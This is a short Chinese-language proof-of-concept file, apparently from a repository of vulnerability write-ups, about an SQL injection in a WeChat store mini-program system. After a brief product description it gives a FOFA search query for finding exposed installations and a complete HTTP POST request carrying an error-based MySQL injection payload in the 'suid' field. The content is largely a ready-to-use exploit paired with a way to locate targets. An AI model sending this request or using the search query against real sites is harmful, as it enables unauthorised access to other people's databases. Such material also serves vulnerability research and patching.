POC/wpoc/万能门店小程序/微信万能门店小程序系统存在SQL注入漏洞.md
eeeeeeeeee-code 06c8413e64 first commit
2025-03-04 23:12:57 +08:00

34 lines
1.5 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# 微信万能门店小程序系统存在SQL注入漏洞
# 一、漏洞简介
万能门店微信小程序不限制小程序生成数量,支持多页面,预约功能等。 本套源码包含多商户插件、点餐插件、拼团插件、积分兑换、小程序手机客服等全套十个插件模块。支持后台一键扫码上传小程序和后台通用模板。微信万能门店小程序系统存在SQL注入漏洞
# 二、影响版本
+ 微信万能门店小程序系统
# 三、资产测绘
+ fofa`<font style="color:rgb(221, 17, 68);">"/comhome/cases/index.html"</font>`
+ 特征
![1732115890021-a19be87f-f478-4ee9-971e-bdbeb555e80f.png](./img/mzSFGhMGF76yKh7v/1732115890021-a19be87f-f478-4ee9-971e-bdbeb555e80f-603008.png)
# 四、漏洞复现
```java
POST /api/wxapps/doPageGetFormList HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br, zstd
Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
suid=' AND GTID_SUBSET(CONCAT((SELECT (VERSION()))),1)-- bdmV
```
![1732589208600-f4a25dbf-20d0-4c2d-b78f-6fb8415535e0.png](./img/mzSFGhMGF76yKh7v/1732589208600-f4a25dbf-20d0-4c2d-b78f-6fb8415535e0-164809.png)
> 更新: 2024-11-27 10:00:05
> 原文: <https://www.yuque.com/xiaokp7/ocvun2/pg8al3o5uwx56x74>